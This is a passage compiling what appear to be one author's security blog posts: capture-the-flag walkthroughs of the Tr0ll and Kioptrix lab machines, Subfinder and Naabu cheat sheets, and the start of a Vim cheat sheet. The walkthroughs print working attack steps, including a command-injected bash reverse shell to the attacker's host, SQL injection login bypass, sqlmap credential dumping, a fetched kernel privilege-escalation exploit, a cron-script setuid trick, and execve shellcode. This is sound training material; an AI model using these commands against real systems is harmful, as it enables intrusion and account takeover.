10 + "\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\
xe3\x31\xc9\x89\xca\x6a\x0b\x58\xcd\x80"')
        
          root:~#
          whoami

          root

          root:~#
          cat /root/Proof.txt

          You win this time young Jedi...
          
          a70354f0258dcc00292c72aab3c8b1e4

##Root dance

##Thanks

Thanks to @maleus21 for creating this VM challenege.

Subfinder Cheat Sheet

Dhruv Ambaliya — Fri, 29 Dec 2023 14:37:10 +0000

What is Subfinder
Install Subfinder
Subfinder API Setup
- Subfinder Config File
- Subfinder API Sources
Example Subfinder API Config File
Subfinder Usage
Example Subfinder Commands
Conclusion
Document Changelog

What is Subfinder

Subfinder is a passive subdomain discovery tool made by Project Discovery. The following subfinder cheat sheet provides an overview of the command flags for Subfinder and common command examples for real world usage. Subfinder can be used to obtain a number of valid subdomains both passively and actively, to identify more attack surface for penetration testing or bug bounty recon or assessment.

Install Subfinder

go install -v github.com/projectdiscovery/subfinder/v2/cmd/subfinder@latest

Configure API Keys

Subfinder works straight after install, however with API keys (even a free key) will improve passive subdomain results.

Subfinder Flags & Syntax

root:~# subfinder -h

Subfinder API Setup

Configuring Subfinder to use free or paid API services will likely improve the discovered domains the tool can find. You can list the sources Subfinder uses by running subfinder -ls.

Subfinder Config File

In order to setup subfinder API keys you need to create or modify the existing configuration file. The filesystem location for the subfinder config file is at: $HOME/.config/subfinder/provider-config.yaml the subfinder config file needs to be populated with the API keys that you will need to obtain from the various sources that have (kindly) been listed below.

Subfinder API Sources

Subfinder supports the following data API sources:

NAME	URL
BeVigil	`https://bevigil.com/osint-api`
BinaryEdge	`https://binaryedge.io`
BufferOver	`https://tls.bufferover.run`
C99	`https://api.c99.nl/`
Censys	`https://censys.io`
CertSpotter	`https://sslmate.com/certspotter/api/`
Chaos	`https://chaos.projectdiscovery.io`
Chinaz	`http://my.chinaz.com/ChinazAPI/DataCenter/MyDataApi`
DNSDB	`https://api.dnsdb.info`
Fofa	`https://fofa.info/static_pages/api_help`
FullHunt	`https://fullhunt.io`
GitHub	`https://github.com`
Intelx	`https://intelx.io`
PassiveTotal	`http://passivetotal.org`
quake	`https://quake.360.cn`
Robtex	`https://www.robtex.com/api/`
SecurityTrails	`http://securitytrails.com`
Shodan	`https://shodan.io`
ThreatBook	`https://x.threatbook.cn/en`
VirusTotal	`https://www.virustotal.com`
WhoisXML API	`https://whoisxmlapi.com/`
ZoomEye	`https://www.zoomeye.org`
ZoomEye API	`https://api.zoomeye.org`
dnsrepo	`https://dnsrepo.noc.org`
Hunter	`https://hunter.qianxin.com/`
Facebook	`https://developers.facebook.com`
BuiltWith	`https://api.builtwith.com/domain-api`

Example Subfinder API Config File

The following is an example of the API config file:

binaryedge:
  - 0bf8919b-aab9-42e4-9574-d3b639324597
  - ac244e2f-b635-4581-878a-33f4e79a2c13
censys:
  - ac244e2f-b635-4581-878a-33f4e79a2c13:dd510d6e-1b6e-4655-83f6-f347b363def9
certspotter: []
passivetotal:
  - sample-email@user.com:sample_password
redhuntlabs:
  - ENDPOINT:API_TOKEN
  - https://reconapi.redhuntlabs.com/community/v1/domains/subdomains:joEPzJJp2AuOCw7teAj63HYrPGnsxuPQ
securitytrails: []
shodan:
  - AAAAClP1bJJSRMEYJazgwhJKrggRwKA
github:
  - ghp_lkyJGU3jv1xmwk4SDXavrLDJ4dl2pSJMzj4X
  - ghp_gkUuhkIYdQPj13ifH4KA3cXRn8JD2lqir2d4
zoomeyeapi:
  - 4f73021d-ff95-4f53-937f-83d6db719eec
quake:
  - 0cb9030c-0a40-48a3-b8c4-fca28e466ba3
facebook:
  - APP_ID:APP_SECRET
intelx:
  - HOST:API_KEY
  - 2.intelx.io:s4324-b98b-41b2-220e8-3320f6a1284d

Above file source: https://docs.projectdiscovery.io/tools/subfinder/install#post-install-configuration

Subfinder Usage

How to use Subfinder to find domains:

Flag	Description
`-d, -domain string[]`	domains to find subdomains for
`-dL, -list string`	file containing list of domains for subdomain discovery
`-s, -sources string[]`	specific sources to use for discovery (-s crtsh,github). Use -ls to display all available sources.
`-recursive`	use only sources that can handle subdomains recursively (e.g. subdomain.domain.tld vs domain.tld)
`-all`	use all sources for enumeration (slow)
`-es, -exclude-sources string[]`	sources to exclude from enumeration (-es alienvault,zoomeye)
`-m, -match string[]`	subdomain or list of subdomain to match (file or comma separated)
`-f, -filter string[]`	subdomain or list of subdomain to filter (file or comma separated)
`-rl, -rate-limit int`	maximum number of http requests to send per second
`-t int`	number of concurrent goroutines for resolving (-active only) (default 10)
`-o, -output string`	file to write output to
`-oJ, -json`	write output in JSONL(ines) format
`-oD, -output-dir string`	directory to write output (-dL only)
`-cs, -collect-sources`	include all sources in the output (-json only)
`-oI, -ip`	include host IP in output (-active only)
`-config string`	flag config file (default "$HOME/.config/subfinder/config.yaml")
`-pc, -provider-config string`	provider config file (default "$HOME/.config/subfinder/provider-config.yaml")
`-r string[]`	comma separated list of resolvers to use
`-rL, -rlist string`	file containing list of resolvers to use
`-nW, -active`	display active subdomains only
`-proxy string`	http proxy to use with subfinder
`-ei, -exclude-ip`	exclude IPs from the list of domains
`-silent`	show only subdomains in output
`-version`	show version of subfinder
`-v`	show verbose output
`-nc, -no-color`	disable color in output
`-ls, -list-sources`	list all available sources
`-timeout int`	seconds to wait before timing out (default 30)
`-max-time int`	minutes to wait for enumeration results (default 10)

Example Subfinder Commands

Find Subdomains Single Domain

Find subdomains for a single domain with subfinder:

subfinder -d hackerone.com

               __    _____           __
   _______  __/ /_  / __(_)___  ____/ /__  _____
  / ___/ / / / __ \/ /_/ / __ \/ __  / _ \/ ___/
 (__  ) /_/ / /_/ / __/ / / / / /_/ /  __/ /
/____/\__,_/_.___/_/ /_/_/ /_/\__,_/\___/_/ v2.5.1

		projectdiscovery.io

Use with caution. You are responsible for your actions
Developers assume no liability and are not responsible for any misuse or damage.
By using subfinder, you also agree to the terms of the APIs used.

[INF] Enumerating subdomains for hackerone.com
info.hackerone.com
design.hackerone.com
docs.hackerone.com
events.hackerone.com
web-seo-content-for-business.theflyingkick.websitedesignresource.api.hackerone.com
zendesk2.hackerone.com
fsdkim.hackerone.com
email.gh-mail.hackerone.com
a.ns.hackerone.com
support.hackerone.com
www.hackerone.com
mta-sts.managed.hackerone.com
api.hackerone.com
gslink.hackerone.com
zendesk1.hackerone.com
3d.hackerone.com
links.hackerone.com
mta-sts.hackerone.com
resources.hackerone.com
zendesk4.hackerone.com
zendesk3.hackerone.com
go.hackerone.com
mta-sts.forwarding.hackerone.com
_dmarc.hackerone.com
b.ns.hackerone.com
hackerone.com
defcon.hackerone.com
[INF] Found 27 subdomains for hackerone.com in 30 seconds 33 milliseconds

Verify Subfinder Results With HTTPX

Chain up other tools within your workflow, such as verifying targets have web servers using HTTPX:

echo hackerone.com | subfinder -silent | httpx -silent
https://docs.hackerone.com
https://mta-sts.forwarding.hackerone.com
https://mta-sts.hackerone.com
https://mta-sts.managed.hackerone.com
http://a.ns.hackerone.com
https://www.hackerone.com
http://b.ns.hackerone.com
http://zendesk4.hackerone.com
http://fsdkim.hackerone.com
http://zendesk1.hackerone.com
http://zendesk2.hackerone.com
http://zendesk3.hackerone.com
https://hackerone.com
https://support.hackerone.com
https://resources.hackerone.com
https://gslink.hackerone.com
https://api.hackerone.com

Subfinder + Naabu Portscan

echo hackerone.com | subfinder -silent | naabu -silent
docs.hackerone.com:443
docs.hackerone.com:80
mta-sts.forwarding.hackerone.com:443
mta-sts.forwarding.hackerone.com:80
mta-sts.hackerone.com:80
mta-sts.hackerone.com:443
mta-sts.managed.hackerone.com:80
mta-sts.managed.hackerone.com:443
<--SNIP-->

Conclusion

We hope you found this Subfinder cheat sheet useful, and it helps you get started with this powerful subdomain enumeration tool to find more assets for assessment.

Document Changelog

Last Updated: 04/06/2024 (6th of June 2024)
Author: Arr0way
Notes: Checked syntax was current for latest version of Subfinder + fixed typos.

Last Updated: 12/02/2024 (12th of February 2024)
Author: Dhruv Ambaliya
Notes: Checked syntax was current for latest version of Subfinder + added Subfinder API sources table.

Tr0ll 1 Walkthrough

Dhruv Ambaliya — Tue, 26 Dec 2023 00:12:52 +0000

Difficulty Rating:

Remote Exploit
Local Enumeration
- Weak Filesystem Permissions
- Enumeration Findings
Local Privilege Escalation
- Got Root

I thought I’d have a go at a Boot2Root over Christmas, looking through the VM’s I came accross Tr0ll: 1 the description caught my attention:

Tr0ll was inspired by the constant trolling of the machines within the OSCP labs. The goal is simple, gain root and get Proof.txt from the /root directory. Not for the easily frustrated! Fair warning, there be trolls ahead! Difficulty: Beginner ; Type: boot2root

I downloaded the VM, span it up in VMWare and got cracking.

##Enumeration

nmap -p 1-65535 -sV -sS -A -T4 192.168.78.140

root:~# nmap -p 1-65535 -sV -sS -A -T4 192.168.78.140

Starting Nmap 6.47 ( http://nmap.org ) at 2014-12-24 18:26 GMT
Nmap scan report for 192.168.78.140
Host is up (0.00035s latency).
Not shown: 65532 closed ports
PORT STATE SERVICE VERSION
21/tcp open ftp vsftpd 3.0.2
| ftp-anon: Anonymous FTP login allowed (FTP code 230)
|_-rwxrwxrwx 1 1000 0 8068 Aug 09 23:43 lol.pcap [NSE: writeable]
22/tcp open ssh (protocol 2.0)
| ssh-hostkey:
| 1024 d6:18:d9:ef:75:d3:1c:29:be:14:b5:2b:18:54:a9:c0 (DSA)
| 2048 ee:8c:64:87:44:39:53:8c:24:fe:9d:39:a9:ad:ea:db (RSA)
|_ 256 0e:66:e6:50:cf:56:3b:9c:67:8b:5f:56:ca:ae:6b:f4 (ECDSA)
80/tcp open http Apache httpd 2.4.7 ((Ubuntu))
| http-robots.txt: 1 disallowed entry
|_/secret
|_http-title: Site doesn't have a title (text/html).
1 service unrecognized despite returning data. If you know the service/version, please submit the following fingerprint at http://www.insecure.org/cgi-bin/servicefp-submit.cgi :
SF-Port22-TCP:V=6.47%I=7%D=12/24%Time=549B054B%P=x86_64-unknown-linux-gnu%
SF:r(NULL,29,"SSH-2\.0-OpenSSH_6\.6\.1p1\x20Ubuntu-2ubuntu2\r\n");
MAC Address: 00:0C:29:D9:C1:FE (VMware)
Device type: general purpose
Running: Linux 3.X
OS CPE: cpe:/o:linux:linux_kernel:3
OS details: Linux 3.11 - 3.14
Network Distance: 1 hop
Service Info: OS: Unix

TRACEROUTE
HOP RTT ADDRESS
1 0.35 ms 192.168.78.140

OS and Service detection performed. Please report any incorrect results at http://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 13.63 seconds

###Service Enumeration

Port	Service	Version Detection
`TCP: 21`	FTP	vsftpd 3.0.2
`TCP: 22`	SSH	protocol 2.0
`TCP: 80`	HTTP	Apache httpd 2.4.7 ((Ubuntu))

###FTP Enumeration

Nmap discovered anonymous FTP was exposed on the target, I downloaded lol.pcap from ftp root:

ftp lol.pcap from target

root:~# ftp 192.168.78.140

Connected to 192.168.78.140
220 (vsFTPd 3.0.2)
Name (192.168.78.140:root): anonymous
331 Please specify the password.
Password:
230 Login successful.
Remote system type is UNIX.
Using binary mode to transfer files.
ftp> get lol.pcap
local: lol.pcap remote: lol.pcap
200 PORT command successful. Consider using PASV.
150 Opening BINARY mode data connection for lol.pcap (8068 bytes).
226 Transfer complete.
80/tcp open http Apache httpd 2.4.7 ((Ubuntu))
8068 bytes received in 0.00 secs (1614.9 kB/s)
ftp> exit
221 Goodbye.

Examined the contents of lol.pcap in Wireshark, discovering the following message:

For clarity the message read:

FTP Data (Well, well, well, aren’t you just a clever little devil, you almost found the sup3rs3cr3tdirlol :-P Sucks, you were so close… gotta TRY HARDER!

Checking for exposed serives in the previous Nmap scan we can see FTP, SSH and HTTP are exposed.

A quick attempt at logging in over SSH with root with the password “sup3rs3cr3tdirlol” - resulted in a fail (as expected).

Onto the next service in the list.

###HTTP Enumeration

nmap --script=http-enum -p80 -n 192.168.78.140

root:~# nmap --script=http-enum -p80 -n 192.168.78.140

Starting Nmap 6.47 ( http://nmap.org ) at 2014-12-24 18:40 GMT
Nmap scan report for 192.168.78.140
Host is up (0.00046s latency).
PORT STATE SERVICE
80/tcp open http
| http-enum:
| /robots.txt: Robots file
|_ /secret/: Potentially interesting folder
MAC Address: 00:0C:29:D9:C1:FE (VMware)

Nmap done: 1 IP address (1 host up) scanned in 0.84 seconds

Entering /secret/ url in the browser rendered:

Nothing exciting was in the page source…

I took a guess and entered sup3rs3cr3tdirlol as a dir:

Lucked in! But it didn’t contain this:

strings output for “roflmao”:

strings ~/Downloads/roflmao

root:~# strings ~/Downloads/roflmao

lib/ld-linux.so.2
libc.so.6
_IO_stdin_used
printf
__libc_start_main
__gmon_start__
GLIBC_2.0
PTRh
[^_]
Find address 0x0856BF to proceed
;*2$"

The binary appeared to just print “0x0856BF”, I entered this in the browser again - not expecting it to work.

I lucked in again!

Another dir contained:

Containing:

Good_job_:)

##SSH Brute Force

I manually attempted a SSH brute force using the previously discovered usernames + password from Pass.txt. After several attempts the connection was refused via SSH, rebooting the target VM did not help - I suspected iptables, fail2ban / DenyHosts.

Changing the attacking machines IP address allowed me to reconnect, none of the usernames authenticated with the password in Pass.txt.

Not sure what to do next, I tried the file name as the password against the previous list (annoyingly I had to change the target machines IP address again to complete).

Remote Exploit

Success, I managed to authenticate using:

Username	Password
`overflow`	Pass.txt

ssh overflow@192.168.78.140

root:~# ssh overflow@192.168.78.140

Welcome to Ubuntu 14.04.1 LTS (GNU/Linux 3.13.0-32-generic i686)

* Documentation: https://help.ubuntu.com/

The programs included with the Ubuntu system are free software; the exact distribution terms for each program are described in the individual files in /usr/share/doc/*/copyright.

Ubuntu comes with ABSOLUTELY NO WARRANTY, to the extent permitted by applicable law.

The programs included with the Ubuntu system are free software; the exact distribution terms for each program are described in the individual files in /usr/share/doc/*/copyright.
Ubuntu comes with ABSOLUTELY NO WARRANTY, to the extent permitted by applicable law.

Last login: Wed Dec 24 12:00:52 2014 from 192.168.78.128
Could not chdir to home directory /home/overflow: No such file or directory

$ id
uid=1002(overflow) gid=1002(overflow) groups=1002(overflow)

Then almost as soon as I’d logged in, the following message printed to console and the session closed:

Broadcast Message from root@trol

Broadcast Message from root@trol
(somewhere) at 22:00 ...

TIMES UP LOL!

This became rather annoying…

Local Enumeration

I copied over my local enumeration sctipt to /var/tmp/ which discovered the following world writable files:

Local Enumeration Sctipt

root:~# wget http://attacking-machine/exploits/enumeration/lin/linux-local-enum.sh -P /var/tmp/ && chmod 700 /var/tmp/linux-local-enum.sh && ./var/tmp/linux-local-enum.sh

Weak Filesystem Permissions

The enumeration script identified the following world writable files:

#########################################
## 777 Files                           ##
#########################################

/srv/ftp/lol.pcap
/var/tmp/cleaner.py.swp
/var/www/html/sup3rs3cr3tdirlol/roflmao
/var/log/cronlog
/lib/log/cleaner.py

Enumeration Findings

/lib/log/cleaner.py was owned by root and executed by cron to clean out /tmp

Local Privilege Escalation

From the attacking machine I downloaded an suid bin (spawns a shell) to /usr/bin/suid on the target.

Exploiting the poor filesystem permissions, I swapped out the contents of /lib/log/cleaner.py for:

#!/usr/bin/env python
import os
import sys
try:
    os.system('chown root:root /var/tmp/suid; chmod 4777 /var/tmp/suid')
except:
    sys.exit()

Got Root

Went to get a coffee, came back and reconnected after the annoying message.

Executed my suid binary, got root.

Local Privilege Escalation

root:~# /var/tmp/suid

root:~# cat /root/proof.txt

Good job, you did it!

702a8c18d29c6f3ca0d99ef5712bfbdc

root:~# id

uid=0(root) gid=0(root) groups=0(root),1002(overflow)

root:~# whoami

root

####Root dance…

##Thanks

Thanks to @maleus21 for creating this VM challenege.

Naabu Cheat Sheet: Commands & Examples

Dhruv Ambaliya — Sat, 23 Dec 2023 10:37:10 +0000

What is Naabu?
Naabu vs Nmap
What does Naabu do:
Download & Install Naabu
- Naabu Linux Install
- Kali
Naabu Example Command Options
- Naabu Scan All Ports
Naabu Input File, Fast Scan + Verify Port 21
Naabu Fast Scan, Verify, Nmap Services
Document Changelog

The following Naabu cheat sheet aims to explain what Naabu is, what it does, and how to install it and use it by providing Nabuu command examples in a cheat sheet style documentation format.

What is Naabu?

Naabu is a simple port scanner written in Golang by Project Discovery, with a goal of being simple and fast.

Naabu vs Nmap

Why use Naabu over Nmap, the primary reason for me personally is the automatic IP deduplication. Meaning, when performing subdomain or domain enumeration of a target organisation, and you feed Naabu an input file of domain or subdomain it will resolve them and only scan unique IP addresses, so you are not wasting time and resources scanning the same target IP address twice.

What does Naabu do:

Host discovery
Automatic IP Deduplication for DNS port scan
Port discovery / enumeration
SYN/CONNECT/UDP probe based scanning
Passive port scanning via Shodan
Performs IPv4/IPv6 port scanning
Can be configured to call Nmap to run NSE scripts post port detection
Multiple input support - STDIN/HOST/IP/CIDR/ASN
Multiple output format support - JSON/TXT/STDOUT

Download & Install Naabu

You can obtain Naabu via the Project Discovery Github.

Naabu Linux Install

go install -v github.com/projectdiscovery/naabu/v2/cmd/naabu@latest

Kali

Kali has a package for Naabu (caveat, it may not be the latest version):

sudo apt install naabu

Naabu File Input Options

Naabu input options, allowing Naabu to read and proccess data from input files.

Command	Description
`-host string[]`	hosts to scan ports for (comma-separated)
`-list, -l string`	list of hosts to scan ports (file)
`-exclude-hosts, -eh string`	hosts to exclude from the scan (comma-separated)
`-exclude-file, -ef string`	list of hosts to exclude from scan (file)

Naabu Port Options

Command	Description
`-port, -p string`	ports to scan (80,443, 100-200
`-top-ports, -tp string`	top ports to scan (default 100)
`-exclude-ports, -ep string`	ports to exclude from scan (comma-separated)
`-ports-file, -pf string`	list of ports to exclude from scan (file)
`-exclude-cdn, -ec`	skip full port scans for CDN's (only checks for 80,443)

Nabu Rate Limiting

Command	Description
`-c int`	general internal worker threads (default 25)
`-rate int`	packets to send per second (default 1000)

Naabu Scan Output Options

Command	Description
`-o, -output string`	file to write output to (optional)
`-json`	write output in JSON lines format
`-csv`	write output in csv format

Naabu Configuration Options

Command	Description
`-scan-all-ips, -sa`	scan all the IP's associated with DNS record
`-scan-type, -s string`	type of port scan (SYN/CONNECT) (default "s")
`-source-ip string`	source ip
`-interface-list, -il`	list available interfaces and public ip
`-interface, -i string`	network Interface to use for port scan
`-nmap`	invoke nmap scan on targets (nmap must be installed) - Deprecated
`-nmap-cli string`	nmap command to run on found results (example: -nmap-cli 'nmap -sV')
`-r string`	list of custom resolver dns resolution (comma separated or from file)
`-proxy string`	socks5 proxy
`-resume`	resume scan using resume.cfg
`-stream`	stream mode (disables resume, nmap, verify, retries, shuffling, etc)

Naabu Optimization Options

Command	Description
`-retries int`	number of retries for the port scan (default 3)
`-timeout int`	millisecond to wait before timing out (default 1000)
`-warm-up-time int`	time in seconds between scan phases (default 2)
`-ping`	ping probes for verification of host
`-verify`	validate the ports again with TCP verification

Naabu Debug Options

Command	Description
`-debug`	display debugging information
`-verbose, -v`	display verbose output
`-no-color, -nc`	disable colors in CLI output
`-silent`	display only results in output
`-version`	display version of naabu
`-stats`	display stats of the running scan
`-si, -stats-interval`	int number of seconds to wait between showing a statistics update (default 5)

Naabu Example Command Options

The following are real world examples of Naabu commands.

Naabu Scan All Ports

naabu -p 0-65535

Naabu Input File, Fast Scan + Verify Port 21

cat 21.txt | ~/go/bin/naabu -verify -ec -rate 9000 -retries 1 -p 21 -warm-up-time 0 -c 50 -silent -o ftp.txt

Naabu Fast Scan, Verify, Nmap Services

Naabu input file, scan all ports, output to text, fast scan, verify open ports, use Nmap to perform service enumeration

naabu -list subdomains.txt -verify -ec -rate 9000 -retries 1 -p 0-65535 -warm-up-time 0 -c 50 -nmap-cli "nmap -sV -oG nmap-naabu-out" -silent -o naabu-full.txt

If you found this Naabu cheat sheet useful, please share it below.

Document Changelog

Last Updated: 12/02/2024 (12th of February 2024)
Author: Dhruv Ambaliya
Notes: Checked syntax was current for latest version of Naabu.

Kioptrix Level 1.2 Walkthrough

Dhruv Ambaliya — Wed, 20 Dec 2023 14:00:10 +0000

Difficulty Rating:

Author Description
Service Enumeration
Web Application Investigation
Non privileged shell
Local Enumeration
Privilege Escalation

Author Description

Service Enumeration

Port	Service	Version Detection
`TCP: 22`	SSH	OpenSSH 4.7p1 Debian 8ubuntu1.3 (protocol 2.0)
`TCP: 80`	HTTP	Apache httpd 2.2.8 ((Ubuntu) PHP/5.2.4-2ubuntu5.6 with Suhosin-Patch)

Web Application Investigation

Enumeration of the website discovered it was likely vulnerable to an SQL Injection, entering id=' rendered the following MySQL error:

SQLMap was used to successfully dump the databases and crack the hashes:

[root:~]# sqlmap -u "http://kioptrix3.com/gallery/gallery.php?id=1" -p id -T dev_accounts --dump

Database: gallery
Table: dev_accounts
[2 entries]
+----+------------+---------------------------------------------+
| id | username   | password                                    |
+----+------------+---------------------------------------------+
| 1  | dreg       | 0d3eccfb887aabd50f243b3f155c0f85 (Mast3r)   |
| 2  | loneferret | 5badcaf789d3d1d09794d8f021f40f0e (starwars) |
+----+------------+---------------------------------------------+

Non privileged shell

Due to password reuse both accounts were able to ssh, dreg had a limited shell.

Local Enumeration

Local enumeration of loneferrets home dir disclosed:

loneferret@Kioptrix3:~$ cat CompanyPolicy.README
Hello new employee,
It is company policy here to use our newly installed software for editing, creating and viewing files.
Please use the command 'sudo ht'.
Failure to do so will result in you immediate termination.

DG
CEO

Privilege Escalation

sudo ht rendered a file explorer, the user loneferret was added to the sudoers group, making privilege escalation trivial.

loneferret@Kioptrix3:~$ sudo -s
root@Kioptrix3:~# id
uid=0(root) gid=0(root) groups=0(root)
root@Kioptrix3:~#

Kioptrix Level 1.1 Walkthrough

Dhruv Ambaliya — Wed, 20 Dec 2023 14:00:10 +0000

Difficulty Rating:

Author Description
Service Enumeration
Web Application Investigation
Non privileged shell
Local privilege Escalation

Author Description

Service Enumeration

Port	Service	Version Detection
`TCP: 22`	SSH	OpenSSH 3.9p1 (protocol 1.99)
`TCP: 80`	HTTP	Apache httpd 2.0.52 ((CentOS))
`TCP: 111`	RPC Bind	N/A
`TCP: 443`	HTTPS	Apache httpd 2.0.52 ((CentOS))
`TCP: 631`	CUPS	CUPS 1.1
`TCP: 946`	RPC	RPC
`TCP: 3306`	MySQL	MySQL (unauthorized)

Web Application Investigation

The web form /index.php was vulnerable to SQL injection, entering the username admin and the password ' or '1'=' successfully bypassed auth.

SQL Injection - Why does ' or '1'='1 work ?

The web application is expecting the SQL query: $query = "SELECT * FROM users WHERE username = 'admin' AND password='blah'"; Entering the above injects the statement after the password='blah' and before the closing ";, the entire sql injection query looks like: $query = "SELECT * FROM users WHERE username = 'admin' AND password=' or '1'='1";" 1 = 1 will always be 1, thus the statement will return true, allowing an attacker to authenticate as admin. The above injection statement correctly closes the sql syntax, however it is possible to comment out the rest of the sql statement using: -- -

The above authentication bypass exposed a web form vulnerable to command injection, the form filtering only checks for the presence of the ping command with no filtering to prevent an attacker tacking a comment on the end using ; insert-command-here.

Non privileged shell

A non privileged reverse shell was obtained using:

ping google.com; bash -i >& /dev/tcp/192.168.221.139/443 0>&1

[root:~]# nc -n -v -l -p 443
listening on [any] 443 ...
connect to [192.168.221.139] from (UNKNOWN) [192.168.221.157] 32770
bash: no job control in this shell
bash-3.00$ id
uid=48(apache) gid=48(apache) groups=48(apache)
bash-3.00$

Local privilege Escalation

bash-3.00$ uname -ar
Linux kioptrix.level2 2.6.9-55.EL #1 Wed May 2 13:52:16 EDT 2007 i686 i686 i386 GNU/Linux
bash-3.00$ cd /tmp
bash-3.00$ wget https://www.exploit-db.com/download/9545 --no-check-certificate
--02:27:58--  https://www.exploit-db.com/download/9545
           => `9545'
Resolving www.exploit-db.com... 192.124.249.8
Connecting to www.exploit-db.com|192.124.249.8|:443... connected.
WARNING: Certificate verification error for www.exploit-db.com: unable to get local issuer certificate
WARNING: certificate common name `*.mycloudproxy.com' doesn't match requested host name `www.exploit-db.com'.
HTTP request sent, awaiting response... 200 OK
Length: unspecified [application/txt]

    0K .........                                                30.10 MB/s

02:27:58 (30.10 MB/s) - `9545' saved [9785]

bash-3.00$ mv 9545 sock_sendpage.c                             
bash-3.00$ gcc -o sock_sendpage sock_sendpage.c
bash-3.00$ ./sock_sendpage
sh: no job control in this shell
sh-3.00# id
uid=0(root) gid=0(root) groups=48(apache)
sh-3.00#

Thanks for the VM :)

Kioptrix Level 1 Walkthrough

Dhruv Ambaliya — Tue, 19 Dec 2023 14:00:10 +0000

Difficulty Rating:

Author Description
Service Enumeration
Samba Enumeration
Metasploit Exploit
Root Flag

Author Description

Service Enumeration

Port	Service	Version Detection
`TCP: 22`	SSH	OpenSSH 2.9p2 (protocol 1.99)
`TCP: 80`	HTTP	Apache httpd 1.3.20 ((Unix)
`TCP: 111`	RPC Bind	N/A
`TCP: 139`	netbios-ssn	Samba
`TCP: 443`	HTTPS	Apache httpd 1.3.20 ((Unix)

Samba Enumeration

Based on the age of the system other services, I know from exeperience that SAMBA is likely vulnerable to the trans2open exploit.

use exploit/linux/samba/trans2open

msf exploit(trans2open) > show options

Module options (exploit/linux/samba/trans2open):

   Name   Current Setting  Required  Description
   ----   ---------------  --------  -----------
   RHOST  192.168.221.156  yes       The target address
   RPORT  139              yes       The target port


Payload options (generic/shell_reverse_tcp):

   Name   Current Setting  Required  Description
   ----   ---------------  --------  -----------
   LHOST  192.168.221.139  yes       The listen address
   LPORT  4444             yes       The listen port


Exploit target:

   Id  Name
   --  ----
   0   Samba 2.2.x - Bruteforce

Metasploit Exploit

msf exploit(trans2open) > run

[*] [2015.12.20-21:05:39] Started reverse handler on 192.168.221.139:4444
[*] [2015.12.20-21:05:40] Trying return address 0xbffffdfc...
[*] [2015.12.20-21:05:41] Trying return address 0xbffffcfc...
[*] [2015.12.20-21:05:42] Trying return address 0xbffffbfc...
[*] [2015.12.20-21:05:43] Trying return address 0xbffffafc...
[*] Command shell session 1 opened (192.168.221.139:4444 -> 192.168.221.156:1025) at 2015-12-20 21:05:44 -0500


^Z
Background session 1? [y/N]  N

id
uid=0(root) gid=0(root) groups=99(nobody)
hostname
kioptrix.level1
^Z
Background session 1? [y/N]  y

Root Flag

sh-2.05# cd /var/spool/mail
cd /var/spool/mail
sh-2.05# ls
ls
harold
john
nfsnobody
root
sh-2.05# cat root   
cat root
From root  Sat Sep 26 11:42:10 2009
Return-Path: <root@kioptix.level1>
Received: (from root@localhost)
    by kioptix.level1 (8.11.6/8.11.6) id n8QFgAZ01831
    for root@kioptix.level1; Sat, 26 Sep 2009 11:42:10 -0400
Date: Sat, 26 Sep 2009 11:42:10 -0400
From: root <root@kioptix.level1>
Message-Id: <200909261542.n8QFgAZ01831@kioptix.level1>
To: root@kioptix.level1
Subject: About Level 2
Status: O

If you are reading this, you got root. Congratulations.
Level 2 won't be as easy...

Vim Cheat Sheet + NEOVIM

Dhruv Ambaliya — Tue, 19 Dec 2023 09:39:10 +0000

Vim Insert mode & Command Mode
- Vim Insert Mode
- Vim Command Mode
Vim File Navigvation
More Advanced Ways of Entering Insert Mode
Vim Replace
Vim Delete
Vim Delete Line commands
Vim Copy and Paste
Vim Search Commands
- Vim Search forward
- Vim Search Back
Vim Search and Replace Commands
Advanced Vim commands
Vim Save commands
- How to Save in Vim
- Vim Save and Exit
Misc Vim Commands
- Vim Undo Command
- Vim Undo All
Vim Show File Name
Vim Multipliers

A collection of Vim commands in a cheat sheet, handy reference document for learning / remembering Vi commands. I refer to Vim / Vi as the same thing in this document, but in most modern Linux distros vi is often a symlink to vim. However, you may want to check out Neovim if you’re on a mac use brew install neovim or your package manager of choice on Linux.

Mac users will need to swap Ctrl for CMD, and deal with the additional annoyance of using their thumbs instead of their pinkie finger.

Vim Insert mode & Command Mode

Vim has two basic modes, insert mode - used for entering text and command mode, used for entering commands. See the tip section below for switching between each mode.

Vim Insert Mode

Enter vi insert mode, insert mode is used for inserting text.

Vim Command	Description
`i`	Enter insert mode from command mode.

Vim Command Mode - Vim Insert Mode

Vim has two modes, insert mode for inserting text and command mode a common mistake is attempting to edit in command mode. If you are unsure on what mode Vim is using double tap escape (enters command mode) and then hit "i" if you wish to enter insert mode.

Vim Command Mode

Vim Command	Description
`Esc`	Hit escape to enter command mode.

Vim File Navigvation

Basic file navigation, how to move up, down, left and right.

Arrow Keys

Modern Vim / Vim editors will allow you to use the arrow keys, but it's worth learning the correct way to navigate vi without using the arrow keys in case you come across Vim command line or a shell that doesn't like arrow keys.

Move up, down, left and right in Vim

You’ll need to be in command mode for these commands, navigation in vim uses h j k l

Vim Command	Description
`h`	Move left - easy to remember h key is on the left
`j`	Move down - I remember it with j(d)own for down
`k`	Move up - k for up - I remember it with (k)up
`l`	Move right - l is on the right side of hjkl and moves you right

Vim Page Down

Vim Command	Description
`Ctrl+F`	Vim move forward a page

Vim Half a Page Down

Vim Command	Description
`Ctrl+D`	Vim move half a page down

Vim Page Up

Vim Command	Description
`Ctrl+B`	Vim move up a page

Vim Half a Page Up

Vim Command	Description
`Ctrl+U`	Vim move up half a page

More Advanced Ways of Entering Insert Mode

Vim Insert Text at Start of the Line

Vim Command	Description
`I`	Insert text at the beginning of the line

Vim Insert Text at the end of the Line

Vim Command	Description
`A`	Appends text at the end of the line

Vim Append text to the right of the Cursor

Vim Command	Description
`a`	Appends text to the right of the cursor

Begin a new line below

Vim Command	Description
`o`	Begin a new line, below the current line

Vim replace line

Vim Command	Description
`O`	Removes line, and allows you to type a new line in it's place

Vim Replace

Change a Word in Vim

Vim Command	Description
`cw`	Replaces a single word, place cursor on first letter and hit cw (Change Word)

Replace line, but not wrapped text

Vim Command	Description
`c$`	Replaces the current line but doesn’t extend to change the rest of a wrapped sentence on the screen

Vim Replace Character

Vim Command	Description
`r`	Replaces only the character under the cursor

Vim Replace

Vim Command	Description
`R`	Replaces over the top of existing text, until the user hits return.

Vim Delete

Vim Delete Single Character After the Cursor

Vim Command	Description
`x`	Vim deletes single character after the cursor

